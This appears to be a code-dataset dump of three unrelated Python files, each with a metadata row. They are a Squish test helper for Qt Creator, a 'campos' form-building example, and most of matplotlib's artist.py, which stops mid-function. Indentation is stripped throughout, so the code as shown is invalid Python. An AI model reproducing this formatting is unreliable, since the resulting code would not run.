result = subprocess.call(__fixQuotes__('"%s" --config addAttachableAUT "%s" %s:%s')
% (squishSrv, executable, host, port), shell=True)
if result == 0:
test.passes("Added %s as attachable AUT" % executable)
else:
test.fail("Failed to add %s as attachable AUT" % executable)
return result == 0
# this function removes the given executable as an attachable AUT
# Bad: executable/port could be empty strings - you should be aware of this
def removeExecutableAsAttachableAUT(executable, port, host=None):
if not __checkParamsForAttachableAUT__(executable, port):
return False
if host == None:
host = "localhost"
squishSrv = __getSquishServer__()
if (squishSrv == None):
return False
result = subprocess.call(__fixQuotes__('"%s" --config removeAttachableAUT "%s" %s:%s')
% (squishSrv, executable, host, port), shell=True)
if result == 0:
test.passes("Removed %s as attachable AUT" % executable)
else:
test.fail("Failed to remove %s as attachable AUT" % executable)
return result == 0
def __checkParamsForAttachableAUT__(executable, port):
return port != None and executable != None
def __getSquishServer__():
squishSrv = currentApplicationContext().environmentVariable("SQUISH_PREFIX")
if (squishSrv == ""):
test.fatal("SQUISH_PREFIX isn't set - leaving test")
return None
return os.path.abspath(squishSrv + "/bin/squishserver")
def __invokeAddCustomExecutable__(exe, args, workingDir=None):
addButton = waitForObject("{container={window=':Qt Creator_Core::Internal::MainWindow' "
"type='ProjectExplorer::Internal::RunSettingsWidget' unnamed='1' "
"visible='1'} occurrence='2' text='Add' type='QPushButton' "
"unnamed='1' visible='1'}")
clickButton(addButton)
addMenu = addButton.menu()
activateItem(waitForObjectItem(addMenu, 'Custom Executable'))
exePathChooser = waitForObject(":Executable:_Utils::PathChooser")
exeLineEd = getChildByClass(exePathChooser, "Utils::FancyLineEdit")
argLineEd = waitForObject("{buddy={window=':Qt Creator_Core::Internal::MainWindow' "
"type='QLabel' text='Arguments:' visible='1'} type='QLineEdit' "
"unnamed='1' visible='1'}")
wdPathChooser = waitForObject("{buddy={window=':Qt Creator_Core::Internal::MainWindow' "
"text='Working directory:' type='QLabel'} "
"type='Utils::PathChooser' unnamed='1' visible='1'}")
wdLineEd = getChildByClass(wdPathChooser, "Utils::FancyLineEdit")
replaceEditorContent(exeLineEd, exe)
replaceEditorContent(argLineEd, args)
if workingDir:
replaceEditorContent(wdLineEd, workingDir)
| lgpl-2.1 | -5,980,354,771,092,611,000 | 50.530414 | 140 | 0.646159 | false |
jbermudezcabrera/campos | examples/building.py | 1 | 2507 | """This example demonstrates the basics on building complete forms using campos.
It creates several fields, marking some of them as required and adding some
custom validation.
Finally fields are added to a CreationForm which have several buttons and a
custom callback connected to one of them. After added, some related fields
are grouped.
"""
__author__ = 'Juan Manuel Bermúdez Cabrera'
def fake_create_person():
if form.valid:
msg = 'ID: {}<br/>'.format(form.id)
msg += 'Name: {}<br/>'.format(form.name)
msg += 'Last name: {}<br/>'.format(form.last_name)
msg += 'Phone: {}<br/>'.format(form.phone)
msg += 'Address: {}<br/>'.format(form.address)
msg += 'Country: {}<br/>'.format(form.country[0])
msg = 'New person created correctly with values:<br/>{}'.format(msg)
msg = '<html>{}</html>'.format(msg)
QMessageBox.information(None, 'Created', msg)
form.close()
def create_form():
id = campos.StringField(name='id', text='Personal ID', max_length=11,
required=True)
name = campos.StringField(name='name', text='Name', required=True)
last = campos.StringField(name='last_name', text='Last name', required=True)
val = campos.RegExp(r'\+?\d+', message='Invalid phone number')
phone = campos.StringField(name='phone', text='Phone number',
validators=[val])
address = campos.StringField(name='address', text='Home address')
country = campos.SelectField(name='country', text='Country', blank=True,
blank_text='Other', choices=['Cuba', 'EE.UU'],
default='Cuba')
fields = (id, name, last, phone, address, country)
global form
form = campos.CreationForm(on_save=fake_create_person, fields=fields)
form.setWindowTitle('Create Person')
# group some fields
form.group('Very personal info', ('phone', 'address'), layout='grid')
form.group('Identification', ['id', 'name', 'last_name'])
return form
if __name__ == '__main__':
import os
import sys
# set gui api to use
os.environ['QT_API'] = 'pyside'
from qtpy.QtWidgets import QMessageBox, QApplication
import campos
# set global settings for validation type and label positions
campos.Validation.set_current('instant')
campos.Labelling.set_current('top')
app = QApplication(sys.argv)
dialog = create_form()
sys.exit(dialog.exec_())
| mit | 6,705,875,902,798,463,000 | 32.864865 | 80 | 0.623703 | false |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/matplotlib/artist.py | 4 | 46827 | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from matplotlib.externals import six
import re
import warnings
import inspect
import numpy as np
import matplotlib
import matplotlib.cbook as cbook
from matplotlib.cbook import mplDeprecation
from matplotlib import docstring, rcParams
from .transforms import (Bbox, IdentityTransform, TransformedBbox,
TransformedPath, Transform)
from .path import Path
# Note, matplotlib artists use the doc strings for set and get
# methods to enable the introspection methods of setp and getp. Every
# set_* method should have a docstring containing the line
#
# ACCEPTS: [ legal | values ]
#
# and aliases for setters and getters should have a docstring that
# starts with 'alias for ', as in 'alias for set_somemethod'
#
# You may wonder why we use so much boiler-plate manually defining the
# set_alias and get_alias functions, rather than using some clever
# python trick. The answer is that I need to be able to manipulate
# the docstring, and there is no clever way to do that in python 2.2,
# as far as I can see - see
#
# https://mail.python.org/pipermail/python-list/2004-October/242925.html
def allow_rasterization(draw):
"""
Decorator for Artist.draw method. Provides routines
that run before and after the draw call. The before and after functions
are useful for changing artist-dependant renderer attributes or making
other setup function calls, such as starting and flushing a mixed-mode
renderer.
"""
def before(artist, renderer):
if artist.get_rasterized():
renderer.start_rasterizing()
if artist.get_agg_filter() is not None:
renderer.start_filter()
def after(artist, renderer):
if artist.get_agg_filter() is not None:
renderer.stop_filter(artist.get_agg_filter())
if artist.get_rasterized():
renderer.stop_rasterizing()
# the axes class has a second argument inframe for its draw method.
def draw_wrapper(artist, renderer, *args, **kwargs):
before(artist, renderer)
draw(artist, renderer, *args, **kwargs)
after(artist, renderer)
# "safe wrapping" to exactly replicate anything we haven't overridden above
draw_wrapper.__name__ = draw.__name__
draw_wrapper.__dict__ = draw.__dict__
draw_wrapper.__doc__ = draw.__doc__
draw_wrapper._supports_rasterization = True
return draw_wrapper
def _stale_axes_callback(self, val):
if self.axes:
self.axes.stale = val
class Artist(object):
"""
Abstract base class for someone who renders into a
:class:`FigureCanvas`.
"""
aname = 'Artist'
zorder = 0
def __init__(self):
self._stale = True
self.stale_callback = None
self._axes = None
self.figure = None
self._transform = None
self._transformSet = False
self._visible = True
self._animated = False
self._alpha = None
self.clipbox = None
self._clippath = None
self._clipon = True
self._label = ''
self._picker = None
self._contains = None
self._rasterized = None
self._agg_filter = None
self._mouseover = False
self.eventson = False # fire events only if eventson
self._oid = 0 # an observer id
self._propobservers = {} # a dict from oids to funcs
try:
self.axes = None
except AttributeError:
# Handle self.axes as a read-only property, as in Figure.
pass
self._remove_method = None
self._url = None
self._gid = None
self._snap = None
self._sketch = rcParams['path.sketch']
self._path_effects = rcParams['path.effects']
def __getstate__(self):
d = self.__dict__.copy()
# remove the unpicklable remove method, this will get re-added on load
# (by the axes) if the artist lives on an axes.
d['_remove_method'] = None
d['stale_callback'] = None
return d
def remove(self):
"""
Remove the artist from the figure if possible. The effect
will not be visible until the figure is redrawn, e.g., with
:meth:`matplotlib.axes.Axes.draw_idle`. Call
:meth:`matplotlib.axes.Axes.relim` to update the axes limits
if desired.
Note: :meth:`~matplotlib.axes.Axes.relim` will not see
collections even if the collection was added to axes with
*autolim* = True.
Note: there is no support for removing the artist's legend entry.
"""
# There is no method to set the callback. Instead the parent should
# set the _remove_method attribute directly. This would be a
# protected attribute if Python supported that sort of thing. The
# callback has one parameter, which is the child to be removed.
if self._remove_method is not None:
self._remove_method(self)
# clear stale callback
self.stale_callback = None
_ax_flag = False
if hasattr(self, 'axes') and self.axes:
# remove from the mouse hit list
self.axes.mouseover_set.discard(self)
# mark the axes as stale
self.axes.stale = True
# decouple the artist from the axes
self.axes = None
_ax_flag = True
if self.figure:
self.figure = None
if not _ax_flag:
self.figure = True
else:
raise NotImplementedError('cannot remove artist')
# TODO: the fix for the collections relim problem is to move the
# limits calculation into the artist itself, including the property of
# whether or not the artist should affect the limits. Then there will
# be no distinction between axes.add_line, axes.add_patch, etc.
# TODO: add legend support
def have_units(self):
'Return *True* if units are set on the *x* or *y* axes'
ax = self.axes
if ax is None or ax.xaxis is None:
return False
return ax.xaxis.have_units() or ax.yaxis.have_units()
def convert_xunits(self, x):
"""For artists in an axes, if the xaxis has units support,
convert *x* using xaxis unit type
"""
ax = getattr(self, 'axes', None)
if ax is None or ax.xaxis is None:
return x
return ax.xaxis.convert_units(x)
def convert_yunits(self, y):
"""For artists in an axes, if the yaxis has units support,
convert *y* using yaxis unit type
"""
ax = getattr(self, 'axes', None)
if ax is None or ax.yaxis is None:
return y
return ax.yaxis.convert_units(y)
def set_axes(self, axes):
"""
Set the :class:`~matplotlib.axes.Axes` instance in which the
artist resides, if any.
This has been deprecated in mpl 1.5, please use the
axes property. Will be removed in 1.7 or 2.0.
ACCEPTS: an :class:`~matplotlib.axes.Axes` instance
"""
warnings.warn(_get_axes_msg.format('set_axes'), mplDeprecation,
stacklevel=1)
self.axes = axes
def get_axes(self):
"""
Return the :class:`~matplotlib.axes.Axes` instance the artist
resides in, or *None*.
This has been deprecated in mpl 1.5, please use the
axes property. Will be removed in 1.7 or 2.0.
"""
warnings.warn(_get_axes_msg.format('get_axes'), mplDeprecation,
stacklevel=1)
return self.axes
@property
def axes(self):
"""
The :class:`~matplotlib.axes.Axes` instance the artist
resides in, or *None*.
"""
return self._axes
@axes.setter
def axes(self, new_axes):
if (new_axes is not None and
(self._axes is not None and new_axes != self._axes)):
raise ValueError("Can not reset the axes. You are "
"probably trying to re-use an artist "
"in more than one Axes which is not "
"supported")
self._axes = new_axes
if new_axes is not None and new_axes is not self:
self.stale_callback = _stale_axes_callback
return new_axes
@property
def stale(self):
"""
If the artist is 'stale' and needs to be re-drawn for the output to
match the internal state of the artist.
"""
return self._stale
@stale.setter
def stale(self, val):
self._stale = val
# if the artist is animated it does not take normal part in the
# draw stack and is not expected to be drawn as part of the normal
# draw loop (when not saving) so do not propagate this change
if self.get_animated():
return
if val and self.stale_callback is not None:
self.stale_callback(self, val)
def get_window_extent(self, renderer):
"""
Get the axes bounding box in display space.
Subclasses should override for inclusion in the bounding box
"tight" calculation. Default is to return an empty bounding
box at 0, 0.
Be careful when using this function, the results will not update
if the artist window extent of the artist changes. The extent
can change due to any changes in the transform stack, such as
changing the axes limits, the figure size, or the canvas used
(as is done when saving a figure). This can lead to unexpected
behavior where interactive figures will look fine on the screen,
but will save incorrectly.
"""
return Bbox([[0, 0], [0, 0]])
def add_callback(self, func):
"""
Adds a callback function that will be called whenever one of
the :class:`Artist`'s properties changes.
Returns an *id* that is useful for removing the callback with
:meth:`remove_callback` later.
"""
oid = self._oid
self._propobservers[oid] = func
self._oid += 1
return oid
def remove_callback(self, oid):
"""
Remove a callback based on its *id*.
.. seealso::
:meth:`add_callback`
For adding callbacks
"""
try:
del self._propobservers[oid]
except KeyError:
pass
def pchanged(self):
"""
Fire an event when property changed, calling all of the
registered callbacks.
"""
for oid, func in six.iteritems(self._propobservers):
func(self)
def is_transform_set(self):
"""
Returns *True* if :class:`Artist` has a transform explicitly
set.
"""
return self._transformSet
def set_transform(self, t):
"""
Set the :class:`~matplotlib.transforms.Transform` instance
used by this artist.
ACCEPTS: :class:`~matplotlib.transforms.Transform` instance
"""
self._transform = t
self._transformSet = True
self.pchanged()
self.stale = True
def get_transform(self):
"""
Return the :class:`~matplotlib.transforms.Transform`
instance used by this artist.
"""
if self._transform is None:
self._transform = IdentityTransform()
elif (not isinstance(self._transform, Transform)
and hasattr(self._transform, '_as_mpl_transform')):
self._transform = self._transform._as_mpl_transform(self.axes)
return self._transform
def hitlist(self, event):
"""
List the children of the artist which contain the mouse event *event*.
"""
L = []
try:
hascursor, info = self.contains(event)
if hascursor:
L.append(self)
except:
import traceback
traceback.print_exc()
print("while checking", self.__class__)
for a in self.get_children():
L.extend(a.hitlist(event))
return L
def get_children(self):
"""
Return a list of the child :class:`Artist`s this
:class:`Artist` contains.
"""
return []
def contains(self, mouseevent):
"""Test whether the artist contains the mouse event.
Returns the truth value and a dictionary of artist specific details of
selection, such as which points are contained in the pick radius. See
individual artists for details.
"""
if six.callable(self._contains):
return self._contains(self, mouseevent)
warnings.warn("'%s' needs 'contains' method" % self.__class__.__name__)
return False, {}
def set_contains(self, picker):
"""
Replace the contains test used by this artist. The new picker
should be a callable function which determines whether the
artist is hit by the mouse event::
hit, props = picker(artist, mouseevent)
If the mouse event is over the artist, return *hit* = *True*
and *props* is a dictionary of properties you want returned
with the contains test.
ACCEPTS: a callable function
"""
self._contains = picker
def get_contains(self):
"""
Return the _contains test used by the artist, or *None* for default.
"""
return self._contains
def pickable(self):
'Return *True* if :class:`Artist` is pickable.'
return (self.figure is not None and
self.figure.canvas is not None and
self._picker is not None)
def pick(self, mouseevent):
"""
call signature::
pick(mouseevent)
each child artist will fire a pick event if *mouseevent* is over
the artist and the artist has picker set
"""
# Pick self
if self.pickable():
picker = self.get_picker()
if six.callable(picker):
inside, prop = picker(self, mouseevent)
else:
inside, prop = self.contains(mouseevent)
if inside:
self.figure.canvas.pick_event(mouseevent, self, **prop)
# Pick children
for a in self.get_children():
# make sure the event happened in the same axes
ax = getattr(a, 'axes', None)
if mouseevent.inaxes is None or ax is None or \
mouseevent.inaxes == ax:
# we need to check if mouseevent.inaxes is None
# because some objects associated with an axes (e.g., a
# tick label) can be outside the bounding box of the
# axes and inaxes will be None
# also check that ax is None so that it traverse objects
# which do no have an axes property but children might
a.pick(mouseevent)
def set_picker(self, picker):
"""
Set the epsilon for picking used by this artist
*picker* can be one of the following:
* *None*: picking is disabled for this artist (default)
* A boolean: if *True* then picking will be enabled and the
artist will fire a pick event if the mouse event is over
the artist
* A float: if picker is a number it is interpreted as an
epsilon tolerance in points and the artist will fire
off an event if it's data is within epsilon of the mouse
event. For some artists like lines and patch collections,
the artist may provide additional data to the pick event
that is generated, e.g., the indices of the data within
epsilon of the pick event
* A function: if picker is callable, it is a user supplied
function which determines whether the artist is hit by the
mouse event::
hit, props = picker(artist, mouseevent)
to determine the hit test. if the mouse event is over the
artist, return *hit=True* and props is a dictionary of
properties you want added to the PickEvent attributes.
ACCEPTS: [None|float|boolean|callable]
"""
self._picker = picker
def get_picker(self):
'Return the picker object used by this artist'
return self._picker
def is_figure_set(self):
"""
Returns True if the artist is assigned to a
:class:`~matplotlib.figure.Figure`.
"""
return self.figure is not None
def get_url(self):
"""
Returns the url
"""
return self._url
def set_url(self, url):
"""
Sets the url for the artist
ACCEPTS: a url string
"""
self._url = url
def get_gid(self):
"""
Returns the group id
"""
return self._gid
def set_gid(self, gid):
"""
Sets the (group) id for the artist
ACCEPTS: an id string
"""
self._gid = gid
def get_snap(self):
"""
Returns the snap setting which may be:
* True: snap vertices to the nearest pixel center
* False: leave vertices as-is
* None: (auto) If the path contains only rectilinear line
segments, round to the nearest pixel center
Only supported by the Agg and MacOSX backends.
"""
if rcParams['path.snap']:
return self._snap
else:
return False
def set_snap(self, snap):
"""
Sets the snap setting which may be:
* True: snap vertices to the nearest pixel center
* False: leave vertices as-is
* None: (auto) If the path contains only rectilinear line
segments, round to the nearest pixel center
Only supported by the Agg and MacOSX backends.
"""
self._snap = snap
self.stale = True
def get_sketch_params(self):
"""
Returns the sketch parameters for the artist.
Returns
-------
sketch_params : tuple or `None`
A 3-tuple with the following elements:
* `scale`: The amplitude of the wiggle perpendicular to the
source line.
* `length`: The length of the wiggle along the line.
* `randomness`: The scale factor by which the length is
shrunken or expanded.
May return `None` if no sketch parameters were set.
"""
return self._sketch
def set_sketch_params(self, scale=None, length=None, randomness=None):
"""
Sets the sketch parameters.
Parameters
----------
scale : float, optional
The amplitude of the wiggle perpendicular to the source
line, in pixels. If scale is `None`, or not provided, no
sketch filter will be provided.
length : float, optional
The length of the wiggle along the line, in pixels
(default 128.0)
randomness : float, optional
The scale factor by which the length is shrunken or
expanded (default 16.0)
"""
if scale is None:
self._sketch = None
else:
self._sketch = (scale, length or 128.0, randomness or 16.0)
self.stale = True
def set_path_effects(self, path_effects):
"""
set path_effects, which should be a list of instances of
matplotlib.patheffect._Base class or its derivatives.
"""
self._path_effects = path_effects
self.stale = True
def get_path_effects(self):
return self._path_effects
def get_figure(self):
"""
Return the :class:`~matplotlib.figure.Figure` instance the
artist belongs to.
"""
return self.figure
def set_figure(self, fig):
"""
Set the :class:`~matplotlib.figure.Figure` instance the artist
belongs to.
ACCEPTS: a :class:`matplotlib.figure.Figure` instance
"""
# if this is a no-op just return
if self.figure is fig:
return
# if we currently have a figure (the case of both `self.figure`
# and `fig` being none is taken care of above) we then user is
# trying to change the figure an artist is associated with which
# is not allowed for the same reason as adding the same instance
# to more than one Axes
if self.figure is not None:
raise RuntimeError("Can not put single artist in "
"more than one figure")
self.figure = fig
if self.figure and self.figure is not self:
self.pchanged()
self.stale = True
def set_clip_box(self, clipbox):
"""
Set the artist's clip :class:`~matplotlib.transforms.Bbox`.
ACCEPTS: a :class:`matplotlib.transforms.Bbox` instance
"""
self.clipbox = clipbox
self.pchanged()
self.stale = True
def set_clip_path(self, path, transform=None):
"""
Set the artist's clip path, which may be:
* a :class:`~matplotlib.patches.Patch` (or subclass) instance
* a :class:`~matplotlib.path.Path` instance, in which case
an optional :class:`~matplotlib.transforms.Transform`
instance may be provided, which will be applied to the
path before using it for clipping.
* *None*, to remove the clipping path
For efficiency, if the path happens to be an axis-aligned
rectangle, this method will set the clipping box to the
corresponding rectangle and set the clipping path to *None*.
ACCEPTS: [ (:class:`~matplotlib.path.Path`,
:class:`~matplotlib.transforms.Transform`) |
:class:`~matplotlib.patches.Patch` | None ]
"""
from matplotlib.patches import Patch, Rectangle
success = False
if transform is None:
if isinstance(path, Rectangle):
self.clipbox = TransformedBbox(Bbox.unit(),
path.get_transform())
self._clippath = None
success = True
elif isinstance(path, Patch):
self._clippath = TransformedPath(
path.get_path(),
path.get_transform())
success = True
elif isinstance(path, tuple):
path, transform = path
if path is None:
self._clippath = None
success = True
elif isinstance(path, Path):
self._clippath = TransformedPath(path, transform)
success = True
elif isinstance(path, TransformedPath):
self._clippath = path
success = True
if not success:
print(type(path), type(transform))
raise TypeError("Invalid arguments to set_clip_path")
# this may result in the callbacks being hit twice, but grantees they
# will be hit at least once
self.pchanged()
self.stale = True
def get_alpha(self):
"""
Return the alpha value used for blending - not supported on all
backends
"""
return self._alpha
def get_visible(self):
"Return the artist's visiblity"
return self._visible
def get_animated(self):
"Return the artist's animated state"
return self._animated
def get_clip_on(self):
'Return whether artist uses clipping'
return self._clipon
def get_clip_box(self):
'Return artist clipbox'
return self.clipbox
def get_clip_path(self):
'Return artist clip path'
return self._clippath
def get_transformed_clip_path_and_affine(self):
'''
Return the clip path with the non-affine part of its
transformation applied, and the remaining affine part of its
transformation.
'''
if self._clippath is not None:
return self._clippath.get_transformed_path_and_affine()
return None, None
def set_clip_on(self, b):
"""
Set whether artist uses clipping.
When False artists will be visible out side of the axes which
can lead to unexpected results.
ACCEPTS: [True | False]
"""
self._clipon = b
# This may result in the callbacks being hit twice, but ensures they
# are hit at least once
self.pchanged()
self.stale = True
def _set_gc_clip(self, gc):
'Set the clip properly for the gc'
if self._clipon:
if self.clipbox is not None:
gc.set_clip_rectangle(self.clipbox)
gc.set_clip_path(self._clippath)
else:
gc.set_clip_rectangle(None)
gc.set_clip_path(None)
def get_rasterized(self):
"return True if the artist is to be rasterized"
return self._rasterized
def set_rasterized(self, rasterized):
"""
Force rasterized (bitmap) drawing in vector backend output.
Defaults to None, which implies the backend's default behavior
ACCEPTS: [True | False | None]
"""
if rasterized and not hasattr(self.draw, "_supports_rasterization"):
warnings.warn("Rasterization of '%s' will be ignored" % self)
self._rasterized = rasterized
def get_agg_filter(self):
"return filter function to be used for agg filter"
return self._agg_filter
def set_agg_filter(self, filter_func):
"""
set agg_filter fuction.
"""
self._agg_filter = filter_func
self.stale = True
def draw(self, renderer, *args, **kwargs):
'Derived classes drawing method'
if not self.get_visible():
return
self.stale = False
def set_alpha(self, alpha):
"""
Set the alpha value used for blending - not supported on
all backends.
ACCEPTS: float (0.0 transparent through 1.0 opaque)
"""
self._alpha = alpha
self.pchanged()
self.stale = True
def set_visible(self, b):
"""
Set the artist's visiblity.
ACCEPTS: [True | False]
"""
self._visible = b
self.pchanged()
self.stale = True
def set_animated(self, b):
"""
Set the artist's animation state.
ACCEPTS: [True | False]
"""
if self._animated != b:
self._animated = b
self.pchanged()
def update(self, props):
"""
Update the properties of this :class:`Artist` from the
dictionary *prop*.
"""
store = self.eventson
self.eventson = False
changed = False
for k, v in six.iteritems(props):
if k in ['axes']:
setattr(self, k, v)
else:
func = getattr(self, 'set_' + k, None)
if func is None or not six.callable(func):
raise AttributeError('Unknown property %s' % k)
func(v)
changed = True
self.eventson = store
if changed:
self.pchanged()
self.stale = True
def get_label(self):
"""
Get the label used for this artist in the legend.
"""
return self._label
def set_label(self, s):
"""
Set the label to *s* for auto legend.
ACCEPTS: string or anything printable with '%s' conversion.
"""
if s is not None:
self._label = '%s' % (s, )
else:
self._label = None
self.pchanged()
self.stale = True
def get_zorder(self):
"""
Return the :class:`Artist`'s zorder.
"""
return self.zorder
def set_zorder(self, level):
"""
Set the zorder for the artist. Artists with lower zorder
values are drawn first.
ACCEPTS: any number
"""
self.zorder = level
self.pchanged()
self.stale = True
def update_from(self, other):
'Copy properties from *other* to *self*.'
self._transform = other._transform
self._transformSet = other._transformSet
self._visible = other._visible
self._alpha = other._alpha
self.clipbox = other.clipbox
self._clipon = other._clipon
self._clippath = other._clippath
self._label = other._label
self._sketch = other._sketch
self._path_effects = other._path_effects
self.pchanged()
self.stale = True
def properties(self):
"""
return a dictionary mapping property name -> value for all Artist props
"""
return ArtistInspector(self).properties()
def set(self, **kwargs):
"""
A property batch setter. Pass *kwargs* to set properties.
Will handle property name collisions (e.g., if both
'color' and 'facecolor' are specified, the property
with higher priority gets set last).
"""
ret = []
for k, v in sorted(kwargs.items(), reverse=True):
k = k.lower()
funcName = "set_%s" % k
func = getattr(self, funcName, None)
if func is None:
raise TypeError('There is no %s property "%s"' %
(self.__class__.__name__, k))
ret.extend([func(v)])
return ret
def findobj(self, match=None, include_self=True):
"""
Find artist objects.
Recursively find all :class:`~matplotlib.artist.Artist` instances
contained in self.
*match* can be
- None: return all objects contained in artist.
- function with signature ``boolean = match(artist)``
used to filter matches
- class instance: e.g., Line2D. Only return artists of class type.
If *include_self* is True (default), include self in the list to be
checked for a match.
"""
if match is None: # always return True
def matchfunc(x):
return True
elif cbook.issubclass_safe(match, Artist):
def matchfunc(x):
return isinstance(x, match)
elif six.callable(match):
matchfunc = match
else:
raise ValueError('match must be None, a matplotlib.artist.Artist '
'subclass, or a callable')
artists = []
for c in self.get_children():
if matchfunc(c):
artists.append(c)
artists.extend([thisc for thisc in
c.findobj(matchfunc, include_self=False)
if matchfunc(thisc)])
if include_self and matchfunc(self):
artists.append(self)
return artists
def get_cursor_data(self, event):
"""
Get the cursor data for a given event.
"""
return None
def format_cursor_data(self, data):
"""
Return *cursor data* string formatted.
"""
try:
data[0]
except (TypeError, IndexError):
data = [data]
return ', '.join('{:0.3g}'.format(item) for item in data if
isinstance(item, (np.floating, np.integer, int, float)))
@property
def mouseover(self):
return self._mouseover
@mouseover.setter
def mouseover(self, val):
val = bool(val)
self._mouseover = val
ax = self.axes
if ax:
if val:
ax.mouseover_set.add(self)
else:
ax.mouseover_set.discard(self)
class ArtistInspector(object):
"""
A helper class to inspect an :class:`~matplotlib.artist.Artist`
and return information about it's settable properties and their
current values.
"""
def __init__(self, o):
"""
Initialize the artist inspector with an
:class:`~matplotlib.artist.Artist` or sequence of :class:`Artists`.
If a sequence is used, we assume it is a homogeneous sequence (all
:class:`Artists` are of the same type) and it is your responsibility
to make sure this is so.
"""
if cbook.iterable(o) and len(o):
o = o[0]
self.oorig = o
if not isinstance(o, type):
o = type(o)
self.o = o
self.aliasd = self.get_aliases()
def get_aliases(self):
"""
Get a dict mapping *fullname* -> *alias* for each *alias* in
the :class:`~matplotlib.artist.ArtistInspector`.
e.g., for lines::
{'markerfacecolor': 'mfc',
'linewidth' : 'lw',
}
"""
names = [name for name in dir(self.o) if
(name.startswith('set_') or name.startswith('get_'))
and six.callable(getattr(self.o, name))]
aliases = {}
for name in names:
func = getattr(self.o, name)
if not self.is_alias(func):
continue
docstring = func.__doc__
fullname = docstring[10:]
aliases.setdefault(fullname[4:], {})[name[4:]] = None
return aliases
_get_valid_values_regex = re.compile(
r"\n\s*ACCEPTS:\s*((?:.|\n)*?)(?:$|(?:\n\n))"
)
def get_valid_values(self, attr):
"""
Get the legal arguments for the setter associated with *attr*.
This is done by querying the docstring of the function *set_attr*
for a line that begins with ACCEPTS:
e.g., for a line linestyle, return
"[ ``'-'`` | ``'--'`` | ``'-.'`` | ``':'`` | ``'steps'`` | ``'None'``
]"
"""
name = 'set_%s' % attr
if not hasattr(self.o, name):
raise AttributeError('%s has no function %s' % (self.o, name))
func = getattr(self.o, name)
docstring = func.__doc__
if docstring is None:
return 'unknown'
if docstring.startswith('alias for '):
return None
match = self._get_valid_values_regex.search(docstring)
if match is not None:
return re.sub("\n *", " ", match.group(1))
return 'unknown'
def _get_setters_and_targets(self):
"""
Get the attribute strings and a full path to where the setter
is defined for all setters in an object.
"""
setters = []
for name in dir(self.o):
if not name.startswith('set_'):
continue
o = getattr(self.o, name)
if not six.callable(o):
continue
if six.PY2:
nargs = len(inspect.getargspec(o)[0])
else:
nargs = len(inspect.getfullargspec(o)[0])
if nargs < 2:
continue
func = o
if self.is_alias(func):
continue
source_class = self.o.__module__ + "." + self.o.__name__
for cls in self.o.mro():
if name in cls.__dict__:
source_class = cls.__module__ + "." + cls.__name__
break
setters.append((name[4:], source_class + "." + name))
return setters
def get_setters(self):
"""
Get the attribute strings with setters for object. e.g., for a line,
return ``['markerfacecolor', 'linewidth', ....]``.
"""
return [prop for prop, target in self._get_setters_and_targets()]
def is_alias(self, o):
"""
Return *True* if method object *o* is an alias for another
function.
"""
ds = o.__doc__
if ds is None:
return False
return ds.startswith('alias for ')
def aliased_name(self, s):
"""
return 'PROPNAME or alias' if *s* has an alias, else return
PROPNAME.
e.g., for the line markerfacecolor property, which has an
alias, return 'markerfacecolor or mfc' and for the transform
property, which does not, return 'transform'
"""
if s in self.aliasd:
return s + ''.join([' or %s' % x
for x
in six.iterkeys(self.aliasd[s])])
else:
return s
def aliased_name_rest(self, s, target):
"""
return 'PROPNAME or alias' if *s* has an alias, else return
PROPNAME formatted for ReST
e.g., for the line markerfacecolor property, which has an
alias, return 'markerfacecolor or mfc' and for the transform
property, which does not, return 'transform'
"""
if s in self.aliasd:
aliases = ''.join([' or %s' % x
for x
in six.iterkeys(self.aliasd[s])])
else:
aliases = ''
return ':meth:`%s <%s>`%s' % (s, target, aliases)
def pprint_setters(self, prop=None, leadingspace=2):
"""
If *prop* is *None*, return a list of strings of all settable properies
and their valid values.
If *prop* is not *None*, it is a valid property name and that
property will be returned as a string of property : valid
values.
"""
if leadingspace:
pad = ' ' * leadingspace
else:
pad = ''
if prop is not None:
accepts = self.get_valid_values(prop)
return '%s%s: %s' % (pad, prop, accepts)
attrs = self._get_setters_and_targets()
attrs.sort()
lines = []
for prop, path in attrs:
accepts = self.get_valid_values(prop)
name = self.aliased_name(prop)
lines.append('%s%s: %s' % (pad, name, accepts))
return lines
def pprint_setters_rest(self, prop=None, leadingspace=2):
"""
If *prop* is *None*, return a list of strings of all settable properies
and their valid values. Format the output for ReST
If *prop* is not *None*, it is a valid property name and that
property will be returned as a string of property : valid
values.
"""
if leadingspace:
pad = ' ' * leadingspace
else:
pad = ''
if prop is not None:
accepts = self.get_valid_values(prop)
return '%s%s: %s' % (pad, prop, accepts)
attrs = self._get_setters_and_targets()
attrs.sort()
lines = []
########
names = [self.aliased_name_rest(prop, target)
for prop, target
in attrs]
accepts = [self.get_valid_values(prop) for prop, target in attrs]
col0_len = max([len(n) for n in names])
col1_len = max([len(a) for a in accepts])
table_formatstr = pad + '=' * col0_len + ' ' + '=' * col1_len
lines.append('')
lines.append(table_formatstr)
lines.append(pad + 'Property'.ljust(col0_len + 3) +
'Description'.ljust(col1_len))
lines.append(table_formatstr)
lines.extend([pad + n.ljust(col0_len + 3) + a.ljust(col1_len)
for n, a in zip(names, accepts)])
lines.append(table_formatstr)
lines.append('')
return lines
########
for prop, path in attrs:
accepts = self.get_valid_values(prop)
name = self.aliased_name_rest(prop, path)
lines.append('%s%s: %s' % (pad, name, accepts))
return lines
def properties(self):
"""
return a dictionary mapping property name -> value
"""
o = self.oorig
getters = [name for name in dir(o)
if name.startswith('get_')
and six.callable(getattr(o, name))]
getters.sort()
d = dict()
for name in getters:
func = getattr(o, name)
if self.is_alias(func):
continue
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
val = func()
except:
continue
else:
d[name[4:]] = val
return d
def pprint_getters(self):
"""
Return the getters and actual values as list of strings.
"""
d = self.properties()
names = list(six.iterkeys(d))
names.sort()
lines = []
for name in names:
val = d[name]
if getattr(val, 'shape', ()) != () and len(val) > 6:
s = str(val[:6]) + '...'
else:
s = str(val)
s = s.replace('\n', ' ')
if len(s) > 50:
s = s[:50] + '...'
name = self.aliased_name(name)
lines.append(' %s = %s' % (name, s))
return lines
def findobj(self, match=None):
"""
Recursively find all :class:`matplotlib.artist.Artist`
instances contained in *self*.
If *match* is not None, it can be
- function with signature ``boolean = match(artist)``
- class instance: e.g., :class:`~matplotlib.lines.Line2D`
used to filter matches.
"""
if match is None: # always return True
def matchfunc(x):
return True
elif issubclass(match, Artist):
def matchfunc(x):
return isinstance(x, match)
elif six.callable(match):
matchfunc = func
else:
raise ValueError('match must be None, an '
'matplotlib.artist.Artist '
